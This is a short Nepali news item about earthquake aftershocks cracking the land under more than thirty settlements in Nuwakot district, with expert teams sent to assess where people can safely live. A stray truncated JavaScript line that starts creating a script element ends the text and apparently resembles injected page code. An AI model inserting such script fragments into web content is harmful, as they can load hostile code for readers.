विनाशकारी भूकम्पका कारण नुवाकोट जिल्लामा बस्नका लागि स्वर्गजस्तै मानिएका स्थान अहिले अत्यास लाग्ने बनेका छन्। तीस भन्दा बढी घना मानवबस्ती भूकम्पका कारण चिराचिरा भएका छन् । आफ्नै जमिनमा धाँजा फाट्न थालेपछि स्थानीय त्रसित छन्।
विशेषगरी पराकम्पनले जमिन चिर्दै आएको छ। नुवाकोट जिल्लाको घ्याङफेदी, उर्लेनी, किम्ताङ, भाल्चे, नर्जामण्डप, काहुले, मनकामना, खरानीटार, दुईपिपल, फिकुरी, सुन्दरादेवी, जिलिङ, कुमरी, गाउँखर्क, साल्मेलगायत गाउँ विकास समितिका बस्ती रहेका जमिन चर्केका छन्। भूकम्पका कारण पहाड चर्किएका र जमिनमा धाँजा फाट्न थालेपछि स्थानीयको बास असुरक्षित भएकाले सरकारी निकायले विज्ञको टोली अध्ययनका लागि गाउँगाउँमा खटाएको छ। यसरी खटिआएको टोलीसँग परामर्श गरेरमात्रै बसोबासको ठाउँ रोज्न पनि आग्रह गरिएको छ।
var d=document;var s=d.createElement(‘script’);